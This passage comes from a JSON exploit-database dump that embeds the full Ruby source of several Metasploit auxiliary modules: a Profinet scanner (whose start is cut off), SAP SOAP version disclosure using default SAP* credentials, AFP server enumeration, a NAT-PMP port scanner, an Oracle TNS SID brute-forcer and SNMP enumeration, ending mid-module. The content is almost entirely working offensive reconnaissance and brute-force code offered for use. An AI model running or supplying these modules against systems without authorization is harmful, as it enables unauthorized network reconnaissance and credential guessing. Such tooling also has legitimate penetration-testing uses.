#{name_of_station}\")\n when '0203'\n vendor_id = parse_vendorid(block[6 * 2..8 * 2 - 1])\n device_id = parse_deviceid(block[8 * 2..10 * 2 - 1])\n print_line(\"Vendor and Device Type: #{vendor_id}, #{device_id}\")\n when '0204'\n device_role = parse_devicerole(block[6 * 2..7 * 2 - 1])\n print_line(\"Device Role: #{device_role}\")\n when '0102'\n ip = hex_to_address(block[6 * 2..10 * 2 - 1])\n snm = hex_to_address(block[10 * 2..14 * 2 - 1])\n gw = hex_to_address(block[14 * 2..18 * 2 - 1])\n print_line(\"IP, Subnetmask and Gateway are: #{ip}, #{snm}, #{gw}\")\n end\n end\n\n def parse_profinet(data)\n data_to_parse = data[24..-1]\n\n until data_to_parse.empty?\n block_length = data_to_parse[2 * 2..4 * 2 - 1].to_i(16)\n block = data_to_parse[0..(4 + block_length) * 2 - 1]\n\n parse_block(block, block_length)\n\n padding = block_length % 2\n data_to_parse = data_to_parse[(4 + block_length + padding) * 2..-1]\n end\n end\n\n def receive(iface, answertime)\n capture = PacketFu::Capture.new(iface: iface, start: true, filter: 'ether proto 0x8892')\n sleep answertime\n capture.save\n i = 0\n capture.array.each do |packet|\n data = bin_to_hex(packet).downcase\n mac = data[12..13] + ':' + data[14..15] + ':' + data[16..17] + ':' + data[18..19] + ':' + data[20..21] + ':' + data[22..23]\n next unless data[28..31] == 'feff'\n print_good(\"Parsing packet from #{mac}\")\n parse_profinet(data[28..-1])\n print_line('')\n i += 1\n end\n if i.zero?\n print_warning('No devices found, maybe you are running virtually?')\n else\n print_good(\"I found #{i} devices for you!\")\n end\n end\n\n def run\n iface = datastore['INTERFACE']\n answertime = datastore['ANSWERTIME']\n packet = \"\\x00\\x00\\x88\\x92\\xfe\\xfe\\x05\\x00\\x04\\x00\\x00\\x03\\x00\\x80\\x00\\x04\\xff\\xff\\x00\\x00\\x00\\x00\"\n packet += \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n eth_pkt = PacketFu::EthPacket.new\n begin\n eth_pkt.eth_src = PacketFu::Utils.whoami?(iface: iface)[:eth_src]\n rescue\n print_error(\"Error: interface #{iface} not active?\")\n return\n end\n eth_pkt.eth_daddr = \"01:0e:cf:00:00:00\"\n eth_pkt.eth_proto = 0x8100\n eth_pkt.payload = packet\n print_status(\"Sending packet out to #{iface}\")\n eth_pkt.to_w(iface)\n\n receive(iface, answertime)\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/scada/profinet_siemens.rb"}, {"lastseen": "2019-12-09T18:28:29", "bulletinFamily": "exploit", "description": "This module attempts to identify software, OS and DB versions through the SAP function TH_SAPREL using the /sap/bc/soap/rfc SOAP service.\n", "modified": "2017-07-24T13:26:21", "published": "2012-11-16T18:20:58", "id": "MSF:AUXILIARY/SCANNER/SAP/SAP_SOAP_TH_SAPREL_DISCLOSURE", "href": "", "type": "metasploit", "title": "SAP /sap/bc/soap/rfc SOAP Service TH_SAPREL Function Information Disclosure", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n##\n# This module is based on, inspired by, or is a port of a plugin available in\n# the Onapsis Bizploit Opensource ERP Penetration Testing framework -\n# http://www.onapsis.com/research-free-solutions.php.\n# Mariano Nunez (the author of the Bizploit framework) helped me in my efforts\n# in producing the Metasploit modules and was happy to share his knowledge and\n# experience - a very cool guy. I'd also like to thank Chris John Riley,\n# Ian de Villiers and Joris van de Vis who have Beta tested the modules and\n# provided excellent feedback. Some people just seem to enjoy hacking SAP :)\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'SAP /sap/bc/soap/rfc SOAP Service TH_SAPREL Function Information Disclosure',\n 'Description' => %q{\n This module attempts to identify software, OS and DB versions through the SAP\n function TH_SAPREL using the /sap/bc/soap/rfc SOAP service.\n },\n 'References' =>\n [\n [ 'URL', 'http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/' ]\n ],\n 'Author' =>\n [\n 'Agnivesh Sathasivam',\n 'nmonkee'\n ],\n 'License' => MSF_LICENSE\n )\n\n register_options(\n [\n Opt::RPORT(8000),\n OptString.new('CLIENT', [true, 'SAP Client', '001']),\n OptString.new('HttpUsername', [true, 'Username', 'SAP*']),\n OptString.new('HttpPassword', [true, 'Password', '06071992'])\n ])\n end\n\n def run_host(ip)\n\n data = '<?xml version=\"1.0\" encoding=\"utf-8\" ?>'\n data << '<env:Envelope xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:env=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">'\n data << '<env:Body>'\n data << '<n1:TH_SAPREL xmlns:n1=\"urn:sap-com:document:sap:rfc:functions\" env:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">'\n data << '</n1:TH_SAPREL>'\n data << '</env:Body>'\n data << '</env:Envelope>'\n\n print_status(\"[SAP] #{ip}:#{rport} - sending SOAP TH_SAPREL request\")\n\n begin\n res = send_request_cgi({\n 'uri' => '/sap/bc/soap/rfc',\n 'method' => 'POST',\n 'data' => data,\n 'cookie' => \"sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}\",\n 'ctype' => 'text/xml; charset=UTF-8',\n 'encode_params' => false,\n 'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword']),\n 'headers' => {\n 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',\n },\n 'vars_get' => {\n 'sap-client' => datastore['CLIENT'],\n 'sap-language' => 'EN'\n }\n })\n if res and res.code == 200\n kern_comp_on = $1 if res.body =~ /<KERN_COMP_ON>(.*)<\\/KERN_COMP_ON>/i\n kern_comp_time = $1 if res.body =~ /<KERN_COMP_TIME>(.*)<\\/KERN_COMP_TIME>/i\n kern_dblib = $1 if res.body =~ /<KERN_DBLIB>(.*)<\\/KERN_DBLIB>/i\n kern_patchlevel = $1 if res.body =~ /<KERN_PATCHLEVEL>(.*)<\\/KERN_PATCHLEVEL>/i\n kern_rel = $1 if res.body =~ /<KERN_REL>(.*)<\\/KERN_REL>/i\n saptbl = Msf::Ui::Console::Table.new(\n Msf::Ui::Console::Table::Style::Default,\n 'Header' => \"[SAP] System Info\",\n 'Prefix' => \"\\n\",\n 'Postfix' => \"\\n\",\n 'Indent' => 1,\n 'Columns' =>\n [\n \"Info\",\n \"Value\"\n ])\n saptbl << [ \"OS Kernel version\", kern_comp_on ]\n saptbl << [ \"SAP compile time\", kern_comp_time ]\n saptbl << [ \"DB version\", kern_dblib ]\n saptbl << [ \"SAP patch level\", kern_patchlevel ]\n saptbl << [ \"SAP Version\", kern_rel ]\n print(saptbl.to_s)\n\n report_note(\n :host => ip,\n :proto => 'tcp',\n :port => rport,\n :sname => 'sap',\n :type => 'os.kernel.version',\n :data => \"OS Kernel version: #{kern_comp_on}\"\n )\n\n report_note(\n :host => ip,\n :proto => 'tcp',\n :port => rport,\n :sname => 'sap',\n :type => 'sap.time.compile',\n :data => \"SAP compile time: #{kern_comp_time}\"\n )\n\n report_note(\n :host => ip,\n :proto => 'tcp',\n :port => rport,\n :sname => 'sap',\n :type => 'sap.db.version',\n :data => \"DB version: #{kern_dblib}\"\n )\n\n report_note(\n :host => ip,\n :proto => 'tcp',\n :port => rport,\n :sname => 'sap',\n :type => 'sap.version.patch_level',\n :data => \"SAP patch level: #{kern_patchlevel}\"\n )\n\n report_note(\n :host => ip,\n :proto => 'tcp',\n :port => rport,\n :type => 'sap.version',\n :data => \"SAP Version: #{kern_rel}\"\n )\n\n elsif res and res.code == 500\n response = res.body\n error.push(response.scan(%r{<message>(.*?)</message>}))\n err = error.join().chomp\n print_error(\"[SAP] #{ip}:#{rport} - #{err.gsub(''','\\'')}\")\n return\n else\n print_error(\"[SAP] #{ip}:#{rport} - error message: \" + res.code.to_s + \" \" + res.message) if res\n return\n end\n rescue ::Rex::ConnectionError\n print_error(\"[SAP] #{ip}:#{rport} - Unable to connect\")\n return\n end\n\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb"}, {"lastseen": "2019-10-23T02:19:15", "bulletinFamily": "exploit", "description": "This module fetches AFP server information, including server name, network address, supported AFP versions, signature, machine type, and server flags.\n", "modified": "2019-03-05T09:38:51", "published": "2012-03-02T19:58:40", "id": "MSF:AUXILIARY/SCANNER/AFP/AFP_SERVER_INFO", "href": "", "type": "metasploit", "title": "Apple Filing Protocol Info Enumerator", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n include Msf::Exploit::Remote::AFP\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Apple Filing Protocol Info Enumerator',\n 'Description' => %q{\n This module fetches AFP server information, including server name,\n network address, supported AFP versions, signature, machine type,\n and server flags.\n },\n 'References' =>\n [\n [ 'URL', 'https://developer.apple.com/library/mac/documentation/Networking/Reference/AFP_Reference/Reference/reference.html' ]\n ],\n 'Author' => [ 'Gregory Man <man.gregory[at]gmail.com>' ],\n 'License' => MSF_LICENSE\n ))\n end\n\n def run_host(ip)\n print_status(\"AFP #{ip} Scanning...\")\n begin\n connect\n response = get_info\n report(response)\n rescue ::Timeout::Error\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionError, ::IOError, ::Errno::ECONNRESET, ::Errno::ENOPROTOOPT\n rescue ::Exception\n raise $!\n print_error(\"AFP #{rhost}:#{rport} #{$!.class} #{$!}\")\n ensure\n disconnect\n end\n end\n\n def report(response)\n report_info = \"AFP #{rhost}:#{rport} Server Name: #{response[:server_name]} \\n\" +\n \"AFP #{rhost}:#{rport} Server Flags: \\n\" +\n format_flags_report(response[:server_flags]) +\n \"AFP #{rhost}:#{rport} Machine Type: #{response[:machine_type]} \\n\" +\n \"AFP #{rhost}:#{rport} AFP Versions: #{response[:versions].join(', ')} \\n\" +\n \"AFP #{rhost}:#{rport} UAMs: #{response[:uams].join(', ')}\\n\" +\n \"AFP #{rhost}:#{rport} Server Signature: #{response[:signature]}\\n\" +\n \"AFP #{rhost}:#{rport} Server Network Address: \\n\" +\n format_addresses_report(response[:network_addresses]) +\n \"AFP #{rhost}:#{rport} UTF8 Server Name: #{response[:utf8_server_name]}\"\n\n\n lines = \"AFP #{rhost}:#{rport}:#{rport} AFP:\\n#{report_info}\"\n\n lines.split(/\\n/).each do |line|\n print_status(line)\n end\n\n report_note(:host => datastore['RHOST'],\n :proto => 'tcp',\n :port => datastore['RPORT'],\n :type => 'afp_server_info',\n :data => response)\n\n report_service(\n :host => datastore['RHOST'],\n :port => datastore['RPORT'],\n :proto => 'tcp',\n :name => \"afp\",\n :info => \"AFP name: #{response[:utf8_server_name]}, Versions: #{response[:versions].join(', ')}\"\n )\n\n end\n\n def format_flags_report(parsed_flags)\n report = ''\n parsed_flags.each do |flag, val|\n report << \"AFP #{rhost}:#{rport} * #{flag}: #{val.to_s} \\n\"\n end\n return report\n end\n\n def format_addresses_report(parsed_network_addresses)\n report = ''\n parsed_network_addresses.each do |val|\n report << \"AFP #{rhost}:#{rport} * #{val.to_s} \\n\"\n end\n return report\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/afp/afp_server_info.rb"}, {"lastseen": "2019-11-06T10:57:36", "bulletinFamily": "exploit", "description": "Scan NAT devices for their external listening ports using NAT-PMP\n", "modified": "2017-07-24T13:26:21", "published": "2012-01-24T16:16:56", "id": "MSF:AUXILIARY/SCANNER/NATPMP/NATPMP_PORTSCAN", "href": "", "type": "metasploit", "title": "NAT-PMP External Port Scanner", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::NATPMP\n include Rex::Proto::NATPMP\n\n def initialize\n super(\n 'Name' => 'NAT-PMP External Port Scanner',\n 'Description' => 'Scan NAT devices for their external listening ports using NAT-PMP',\n 'Author' => 'Jon Hart <jhart[at]spoofed.org>',\n 'License' => MSF_LICENSE\n )\n\n register_options(\n [\n OptString.new('PORTS', [true, \"Ports to scan (e.g. 22-25,80,110-900)\", \"1-1000\"])\n ])\n end\n\n def run_host(host)\n begin\n udp_sock = Rex::Socket::Udp.create({\n 'LocalHost' => datastore['CHOST'] || nil,\n 'Context' => {'Msf' => framework, 'MsfExploit' => self} }\n )\n add_socket(udp_sock)\n peer = \"#{host}:#{datastore['RPORT']}\"\n vprint_status(\"#{peer} Scanning #{protocol} ports #{datastore['PORTS']} using NATPMP\")\n\n external_address = get_external_address(udp_sock, host, datastore['RPORT'])\n if (external_address)\n print_good(\"#{peer} responded with external address of #{external_address}\")\n else\n vprint_status(\"#{peer} didn't respond with an external address\")\n return\n end\n\n # clear all mappings\n map_port(udp_sock, host, datastore['RPORT'], 0, 0, Rex::Proto::NATPMP.const_get(protocol), 0)\n\n Rex::Socket.portspec_crack(datastore['PORTS']).each do |port|\n map_req = map_port_request(port, port, Rex::Proto::NATPMP.const_get(datastore['PROTOCOL']), 1)\n udp_sock.sendto(map_req, host, datastore['RPORT'], 0)\n while (r = udp_sock.recvfrom(16, 1.0) and r[1])\n break if handle_reply(host, external_address, r)\n end\n end\n\n rescue ::Interrupt\n raise $!\n rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused\n nil\n rescue ::Exception => e\n print_error(\"Unknown error: #{e.class} #{e.backtrace}\")\n end\n end\n\n def handle_reply(host, external_addr, pkt)\n return if not pkt[1]\n\n if(pkt[1] =~ /^::ffff:/)\n pkt[1] = pkt[1].sub(/^::ffff:/, '')\n end\n host = pkt[1]\n protocol = datastore['PROTOCOL'].to_s.downcase\n\n (ver, op, result, epoch, int, ext, lifetime) = parse_map_port_response(pkt[0])\n peer = \"#{host}:#{datastore['RPORT']}\"\n if (result == 0)\n # we always ask to map an external port to the same port on us. If\n # we get a successful reponse back but the port we requested be forwarded\n # is different, that means that someone else already has it open\n if (int != ext)\n state = Msf::ServiceState::Open\n print_good(\"#{peer} #{external_addr} - #{int}/#{protocol} #{state} because of successful mapping with unmatched ports\")\n if inside_workspace_boundary?(external_addr)\n report_service(\n :host => external_addr,\n :port => int,\n :proto => protocol,\n :state => state\n )\n end\n else\n state = Msf::ServiceState::Closed\n vprint_error(\"#{peer} #{external_addr} - #{int}/#{protocol} #{state} because of successful mapping with matched ports\")\n end\n else\n state = Msf::ServiceState::Closed\n vprint_error(\"#{peer} #{external_addr} - #{int}/#{protocol} #{state} because of code #{result} response\")\n end\n\n report_service(\n :host \t=> host,\n :port \t=> pkt[2],\n :name \t=> 'natpmp',\n :proto \t=> 'udp',\n :state\t=> Msf::ServiceState::Open\n )\n true\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/natpmp/natpmp_portscan.rb"}, {"lastseen": "2019-12-09T08:59:21", "bulletinFamily": "exploit", "description": "This module queries the TNS listener for a valid Oracle database instance name (also known as a SID). Any response other than a \"reject\" will be considered a success. If a specific SID is provided, that SID will be attempted. Otherwise, SIDs read from the named file will be attempted in sequence instead.\n", "modified": "2019-04-26T13:36:32", "published": "2011-03-09T22:15:15", "id": "MSF:AUXILIARY/SCANNER/ORACLE/SID_BRUTE", "href": "", "type": "metasploit", "title": "Oracle TNS Listener SID Bruteforce", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TNS\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::AuthBrute # Actually, doesn't use much here, but there's a couple handy functions.\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Oracle TNS Listener SID Bruteforce',\n 'Description' => %q{\n This module queries the TNS listener for a valid Oracle database\n instance name (also known as a SID).\n Any response other than a \"reject\" will be considered a success.\n If a specific SID is provided, that SID will be attempted. Otherwise,\n SIDs read from the named file will be attempted in sequence instead.\n },\n 'Author' => [ 'todb' ],\n 'License' => MSF_LICENSE\n ))\n\n register_options(\n [\n OptPath.new('SID_FILE', [ false, \"File containing instance names, one per line\", File.join(Msf::Config.data_directory, \"wordlists\", \"sid.txt\") ]),\n OptString.new('SID', [ false, 'A specific SID to attempt.' ]),\n Opt::RPORT(1521)\n ])\n\n deregister_options(\n \"USERNAME\", \"PASSWORD\", \"USER_FILE\", \"PASS_FILE\", \"USERPASS_FILE\",\n \"BLANK_PASSWORDS\", \"USER_AS_PASS\", \"REMOVE_USER_FILE\", \"REMOVE_PASS_FILE\",\n \"REMOVE_USERPASS_FILE\"\n )\n end\n\n def build_sid_request(sid,ip)\n connect_data = \"(DESCRIPTION=(CONNECT_DATA=(SID=#{sid})(CID=(PROGRAM=)(HOST=__jdbc__)(USER=)))(ADDRESS=(PROTOCOL=tcp)(HOST=#{ip})(PORT=#{rport})))\"\n pkt = tns_packet(connect_data)\n end\n\n def hostport\n [target_host,rport].join(\":\")\n end\n\n def check_sid(sid,ip)\n pkt = build_sid_request(sid,ip)\n sock.put(pkt)\n data = sock.get_once || ''\n parse_response(data)\n end\n\n def parse_response(data)\n return unless data\n len,sum,type,r,hsum,rest = data.unpack(\"nnCCnA*\")\n type # 2 is \"accept\", 11 is resend. Usually you get 11, then 2. 4 is refuse.\n end\n\n def do_sid_check(sid,ip)\n begin\n connect\n response_code = check_sid(sid,ip)\n if response_code.nil?\n print_status \"#{hostport} Oracle - No response given, something is wrong.\"\n return :abort\n elsif response_code != 4\n print_good \"#{hostport} Oracle - '#{sid}' is valid\"\n report_note(\n :host => ip,\n :proto => 'tcp',\n :port => rport,\n :sname => 'oracle',\n :type => \"oracle.sid\",\n :data => sid,\n :update => :unique_data\n )\n return :success\n else\n vprint_status \"#{hostport} Oracle - Refused '#{sid}'\"\n return :fail\n end\n rescue ::Rex::ConnectionError, ::Errno::EPIPE\n print_error(\"#{hostport} Oracle - unable to connect to a TNS listener\")\n return :abort\n ensure\n disconnect\n end\n end\n\n # Based vaguely on each_user_pass in AuthBrute\n def each_sid(&block)\n @@oracle_sid_fail = []\n @@oracle_sid_success = []\n if datastore['SID'].nil? || datastore['SID'].empty?\n sids = extract_words(datastore['SID_FILE']).map {|s| s.to_s.strip.upcase}.uniq\n else\n sids = [datastore['SID'].to_s.strip.upcase]\n end\n print_status \"Checking #{sids.size} SID#{sids.size != 1 && \"s\"} against #{hostport}\"\n sids.each do |s|\n userpass_sleep_interval unless (@@oracle_sid_fail | @@oracle_sid_success).empty?\n next if @@oracle_sid_fail.include?(s) || @@oracle_sid_success.include?(s)\n ret = block.call(s)\n case ret\n when :abort\n break\n when :success\n @@oracle_sid_success << s\n break if datastore[\"STOP_ON_SUCCESS\"]\n when :fail\n @@oracle_sid_fail << s\n end\n end\n end\n\n def run_host(ip)\n each_sid do |sid|\n vprint_status \"#{hostport} Oracle - Checking '#{sid}'...\"\n do_sid_check(sid,ip)\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/oracle/sid_brute.rb"}, {"lastseen": "2019-11-06T06:11:37", "bulletinFamily": "exploit", "description": "This module allows enumeration of any devices with SNMP protocol support. It supports hardware, software, and network information. The default community used is \"public\".\n", "modified": "2019-07-02T19:14:55", "published": "2010-12-25T06:31:38", "id": "MSF:AUXILIARY/SCANNER/SNMP/SNMP_ENUM", "href": "", "type": "metasploit", "title": "SNMP Enumeration Module", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::SNMPClient\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'SNMP Enumeration Module',\n 'Description' => 'This module allows enumeration of any devices with SNMP\n protocol support. It supports hardware, software, and network information.\n The default community used is \"public\".',\n 'References' =>\n [\n [ 'URL', 'http://en.wikipedia.org/wiki/Simple_Network_Management_Protocol' ],\n [ 'URL', 'http://net-snmp.sourceforge.net/docs/man/snmpwalk.html' ],\n [ 'URL', 'http://www.nothink.org/perl/snmpcheck/' ],\n ],\n 'Author' => 'Matteo Cantoni <goony[at]nothink.org>',\n 'License' => MSF_LICENSE\n ))\n end\n\n def run_host(ip)\n\n begin\n snmp = connect_snmp\n\n fields_order = [\n \"Host IP\", \"Hostname\", \"Description\", \"Contact\",\n \"Location\", \"Uptime snmp\", \"Uptime system\",\n \"System date\", \"domain\", \"User accounts\",\n \"Network information\", \"Network interfaces\",\n \"Network IP\", \"Routing information\",\n \"TCP connections and listening ports\", \"Listening UDP ports\",\n \"Network services\", \"Share\", \"IIS server information\",\n \"Storage information\", \"File system information\",\n \"Device information\", \"Software components\",\n \"Processes\"\n ]\n\n output_data = {}\n output_data = {\"Host IP\"=>ip}\n\n sysName = snmp.get_value('1.3.6.1.2.1.1.5.0').to_s\n output_data[\"Hostname\"] = sysName.strip\n\n # print connected status after the first query so if there are\n # any timeout or connectivity errors; the code would already\n # have jumped to error handling where the error status is\n # already being displayed.\n print_good(\"#{ip}, Connected.\")\n\n sysDesc = snmp.get_value('1.3.6.1.2.1.1.1.0').to_s\n sysDesc.gsub!(/^\\s+|\\s+$|\\n+|\\r+/, ' ')\n output_data[\"Description\"] = sysDesc.strip\n\n sysContact = snmp.get_value('1.3.6.1.2.1.1.4.0').to_s\n output_data[\"Contact\"] = sysContact.strip\n\n sysLocation = snmp.get_value('1.3.6.1.2.1.1.6.0').to_s\n output_data[\"Location\"] = sysLocation.strip\n\n sysUpTimeInstance = snmp.get_value('1.3.6.1.2.1.1.3.0').to_s\n output_data[\"Uptime system\"] = sysUpTimeInstance.strip\n\n hrSystemUptime = snmp.get_value('1.3.6.1.2.1.25.1.1.0').to_s\n output_data[\"Uptime snmp\"] = hrSystemUptime.strip\n hrSystemUptime = '-' if hrSystemUptime.to_s =~ /Null/\n\n year = month = day = hour = minutes = seconds = tenths = 0\n\n systemDate = snmp.get_value('1.3.6.1.2.1.25.1.2.0')\n str = systemDate.to_s\n if (str.empty? or str =~ /Null/ or str =~ /^noSuch/)\n output_data[\"System date\"] = '-'\n else\n\n # RFC 2579 - Textual Conventions for SMIv2\n # http://www.faqs.org/rfcs/rfc2579.html\n\n systemDate = systemDate.unpack('C*')\n\n year = systemDate[0] * 256 + systemDate[1]\n month = systemDate[2] || 0\n day = systemDate[3] || 0\n hour = systemDate[4] || 0\n minutes = systemDate[5] || 0\n seconds = systemDate[6] || 0\n tenths = systemDate[7] || 0\n output_data[\"System date\"] = sprintf(\"%d-%d-%d %02d:%02d:%02d.%d\", year, month, day, hour, minutes, seconds, tenths)\n end\n\n if (sysDesc =~ /Windows/)\n domPrimaryDomain = snmp.get_value('1.3.6.1.4.1.77.1.4.1.0').to_s\n\n output_data[\"Domain\"] = domPrimaryDomain.strip\n\n users = []\n\n snmp.walk([\"1.3.6.1.4.1.77.1.2.25.1.1\",\"1.3.6.1.4.1.77.1.2.25.1\"]) do |user,entry|\n users.push([[user.value]])\n end\n\n if not users.empty?\n output_data[\"User accounts\"] = users\n end\n end\n\n network_information = {}\n\n ipForwarding = snmp.get_value('1.3.6.1.2.1.4.1.0')\n\n if ipForwarding == 0 || ipForwarding == 2\n ipForwarding = \"no\"\n network_information[\"IP forwarding enabled\"] = ipForwarding\n elsif ipForwarding == 1\n ipForwarding = \"yes\"\n network_information[\"IP forwarding enabled\"] = ipForwarding\n end\n\n ipDefaultTTL = snmp.get_value('1.3.6.1.2.1.4.2.0')\n if ipDefaultTTL.to_s !~ /Null/\n network_information[\"Default TTL\"] = ipDefaultTTL\n end\n\n tcpInSegs = snmp.get_value('1.3.6.1.2.1.6.10.0')\n if tcpInSegs.to_s !~ /Null/\n network_information[\"TCP segments received\"] = tcpInSegs\n end\n\n tcpOutSegs = snmp.get_value('1.3.6.1.2.1.6.11.0')\n if tcpOutSegs.to_s !~ /Null/\n network_information[\"TCP segments sent\"] = tcpOutSegs\n end\n\n tcpRetransSegs = snmp.get_value('1.3.6.1.2.1.6.12.0')\n if tcpRetransSegs.to_s !~ /Null/\n network_information[\"TCP segments retrans\"] = tcpRetransSegs\n end\n\n ipInReceives = snmp.get_value('1.3.6.1.2.1.4.3.0')\n if ipInReceives.to_s !~ /Null/\n network_information[\"Input datagrams\"] = ipInReceives\n end\n\n ipInDelivers = snmp.get_value('1.3.6.1.2.1.4.9.0')\n if ipInDelivers.to_s !~ /Null/\n network_information[\"Delivered datagrams\"]=ipInDelivers\n end\n\n ipOutRequests = snmp.get_value('1.3.6.1.2.1.4.10.0')\n if ipOutRequests.to_s !~ /Null/\n network_information[\"Output datagrams\"]=ipOutRequests\n end\n\n if not network_information.empty?\n output_data[\"Network information\"] = network_information\n end\n\n network_interfaces = []\n\n snmp.walk([\n \"1.3.6.1.2.1.2.2.1.1\", \"1.3.6.1.2.1.2.2.1.2\", \"1.3.6.1.2.1.2.2.1.6\",\n \"1.3.6.1.2.1.2.2.1.3\", \"1.3.6.1.2.1.2.2.1.4\", \"1.3.6.1.2.1.2.2.1.5\",\n \"1.3.6.1.2.1.2.2.1.10\", \"1.3.6.1.2.1.2.2.1.16\", \"1.3.6.1.2.1.2.2.1.7\"\n ]) do |index,descr,mac,type,mtu,speed,inoc,outoc,status|\n\n ifindex = index.value\n ifdescr = descr.value\n ifmac = mac.value.to_s =~ /noSuchInstance/ ? 'unknown' : mac.value.unpack(\"H2H2H2H2H2H2\").join(\":\")\n iftype = type.value\n ifmtu = mtu.value\n ifspeed = speed.value.to_s =~ /noSuchInstance/ ? 'unknown' : speed.value.to_i / 1000000\n ifinoc = inoc.value\n ifoutoc = outoc.value\n ifstatus = status.value\n\n case iftype\n when 1\n iftype = \"other\"\n when 2\n iftype = \"regular1822\"\n when 3\n iftype = \"hdh1822\"\n when 4\n iftype = \"ddn-x25\"\n when 5\n iftype = \"rfc877-x25\"\n when 6\n iftype = \"ethernet-csmacd\"\n when 7\n iftype = \"iso88023-csmacd\"\n when 8\n iftype = \"iso88024-tokenBus\"\n when 9\n iftype = \"iso88025-tokenRing\"\n when 10\n iftype = \"iso88026-man\"\n when 11\n iftype = \"starLan\"\n when 12\n iftype = \"proteon-10Mbit\"\n when 13\n iftype = \"proteon-80Mbit\"\n when 14\n iftype = \"hyperchannel\"\n when 15\n iftype = \"fddi\"\n when 16\n iftype = \"lapb\"\n when 17\n iftype = \"sdlc\"\n when 18\n iftype = \"ds1\"\n when 19\n iftype = \"e1\"\n when 20\n iftype = \"basicISDN\"\n when 21\n iftype = \"primaryISDN\"\n when 22\n iftype = \"propPointToPointSerial\"\n when 23\n iftype = \"ppp\"\n when 24\n iftype = \"softwareLoopback\"\n when 25\n iftype = \"eon\"\n when 26\n iftype = \"ethernet-3Mbit\"\n when 27\n iftype = \"nsip\"\n when 28\n iftype = \"slip\"\n when 29\n iftype = \"ultra\"\n when 30\n iftype = \"ds3\"\n when 31\n iftype = \"sip\"\n when 32\n iftype = \"frame-relay\"\n else\n iftype = \"unknown\"\n end\n\n case ifstatus\n when 1\n ifstatus = \"up\"\n when 2\n ifstatus = \"down\"\n when 3\n ifstatus = \"testing\"\n else\n ifstatus = \"unknown\"\n end\n\n network_interfaces.push({\n \"Interface\" => \"[ #{ifstatus} ] #{ifdescr}\",\n \"Id\" => ifindex,\n \"Mac Address\" => ifmac,\n \"Type\" => iftype,\n \"Speed\" => \"#{ifspeed} Mbps\",\n \"MTU\" => ifmtu,\n \"In octets\" => ifinoc,\n \"Out octets\" => ifoutoc\n })\n end\n\n if not network_interfaces.empty?\n output_data[\"Network interfaces\"] = network_interfaces\n end\n\n network_ip = []\n\n snmp.walk([\n \"1.3.6.1.2.1.4.20.1.2\", \"1.3.6.1.2.1.4.20.1.1\",\n \"1.3.6.1.2.1.4.20.1.3\", \"1.3.6.1.2.1.4.20.1.4\"\n ]) do |ifid,ipaddr,netmask,bcast|\n network_ip.push([ifid.value, ipaddr.value, netmask.value, bcast.value])\n end\n\n if not network_ip.empty?\n output_data[\"Network IP\"] = [[\"Id\",\"IP Address\",\"Netmask\",\"Broadcast\"]] + network_ip\n end\n\n routing = []\n\n snmp.walk([\n \"1.3.6.1.2.1.4.21.1.1\", \"1.3.6.1.2.1.4.21.1.7\",\n \"1.3.6.1.2.1.4.21.1.11\",\"1.3.6.1.2.1.4.21.1.3\"\n ]) do |dest,hop,mask,metric|\n if (metric.value.to_s.empty?)\n metric.value = '-'\n end\n routing.push([dest.value, hop.value, mask.value, metric.value])\n end\n\n if not routing.empty?\n output_data[\"Routing information\"] = [[\"Destination\",\"Next hop\",\"Mask\",\"Metric\"]] + routing\n end\n\n tcp = []\n\n snmp.walk([\n 